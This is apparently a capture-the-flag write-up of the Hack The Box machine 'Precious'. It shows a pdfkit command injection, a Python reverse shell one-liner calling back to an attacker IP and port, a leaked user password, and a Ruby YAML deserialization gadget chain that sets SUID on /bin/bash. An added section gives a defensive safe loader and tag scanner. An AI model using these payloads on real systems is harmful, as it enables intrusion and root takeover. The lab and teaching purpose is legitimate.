
Precious

```text
IP : 10.10.11.189

sudo nano /etc/hosts
10.10.11.189    precious.htb
```

PORT SCAN RESULTS ➡️


```shell
┌──(kali㉿kali)-[~/Downloads/HTB/Precious]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_results.txt 10.10.11.189
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 12:14 IST
Nmap scan report for 10.10.11.189
Host is up (0.17s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: ; CPE: cpe:/o:linux:linux_kernel
```

Web Enumeration ➡️


In Burp Suite I then got the name and version of the PDF generator »


Since it uses pdfkit v0.8.6 to generate the PDFs, I dug into it and found that this version is vulnerable »


It leads us to this link: Exploit

After reading the PoC I learned that we can use any GET parameter name and, inside its value, wrap our command in backticks to inject it. Here `id` is the injected command:

```text
http://<LOCAL-IP>:<LOCAL-PORT>/?name=%20`id`
```

Now let's try it out ➡️

And it generated the PDF with the results »

So let's try a reverse shell now ⤵️

```text
http://10.10.14.33:8888/?name=%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.33",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
```

I got this »

Now let's log in as henry ⤵️

```text
henry : Q3c1AqGHtoI0aXAYFH
```

Now let's see how to get to root »

Now let's see what is inside this update_dependencies.rb file »

It is loading this dependencies.yml file »

```shell
bash-5.1$ cat dependencies.yml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve
bash-5.1$
```
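What makes that file dangerous is the loader that instantiates its `!ruby/object` tags, so here is the defender-side counterpart as an added example (my code, not the box's update_dependencies.rb): a loader that reads a dependencies file through `YAML.safe_load` with no permitted classes, plus a scanner that walks the parsed syntax tree and reports any `!ruby/` tags without building a single object. Both samples are constructed for the example (the tagged one reuses the first two entries of the file above); it assumes Psych 3.1 or newer, and note that Psych 4 (Ruby 3.1+) already makes `YAML.load` behave like `safe_load`, keeping the old behaviour only in `YAML.unsafe_load`.

```ruby
require 'yaml'

# Constructed sample: the kind of plain data a dependency updater
# should expect (names and versions only).
BENIGN_YAML = <<~YAML
  ---
  - name: pdfkit
    version: "0.8.6"
  - name: example-gem
    version: "1.0.0"
YAML

# Constructed sample: a file that, like dependencies.yml on the box,
# carries Ruby object tags instead of plain data (first two entries only).
TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Installer
      i: x
  - !ruby/object:Gem::SpecFetcher
      i: y
YAML

# Detection: walk the parsed syntax tree (nothing is instantiated at this
# stage) and collect every !ruby/ tag, so a tampered file can be flagged
# by a file monitor or in review before any loader touches it.
def ruby_tags(text)
  doc = YAML.parse(text)
  return [] unless doc
  doc.each
     .select { |node| node.respond_to?(:tag) && node.tag }
     .map(&:tag)
     .select { |tag| tag.start_with?('!ruby/') }
     .uniq
end

# Hardened loader: only plain scalars, arrays and hashes are accepted.
# A tagged node raises Psych::DisallowedClass instead of resolving the
# class, which is exactly what breaks the gadget chain.
def load_dependencies(text)
  YAML.safe_load(text, permitted_classes: [], aliases: false)
end

# Wrapper returning [:ok, data] or [:rejected, exception class name].
def check_dependencies(text)
  [:ok, load_dependencies(text)]
rescue Psych::DisallowedClass, Psych::BadAlias => e
  [:rejected, e.class.name]
end
```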

Now that the payload has made /bin/bash SUID, let's exploit it »


Let's see the flag now ⤵️


If you have any questions or suggestions, please leave a comment below. Thank You !

This post is licensed under CC BY 4.0 by the author.